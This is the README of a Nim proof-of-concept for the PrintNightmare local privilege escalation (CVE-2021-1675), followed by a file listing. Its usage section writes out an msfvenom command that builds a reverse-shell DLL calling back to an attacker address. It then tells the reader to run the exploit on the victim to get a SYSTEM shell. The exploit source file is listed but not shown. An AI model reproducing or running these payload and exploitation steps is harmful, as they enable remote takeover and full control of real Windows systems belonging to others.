CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)# CVE-2021-1675 LPE PoC
not my exploit! just wanted to play around with the `winim` library in nim.
### Usage
Generate DLL payload with `msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.8.237 LPORT=4444 -f dll > msfvenom.dll`, then start the handler on your attacker.
On the victim run `.\nimnightmare.exe <ABSOLUTE_PATH_TO_DLL>` and get a shell as SYSTEM.

[4.0K] /data/pocs/6d6b6ba627e3ca44bf5dd5b84e4cfdc0e8216e9d
├── [476K] img.png
├── [ 88] make.ps1
├── [1.4K] nimnightmare.nim
└── [ 393] README.md
0 directories, 4 files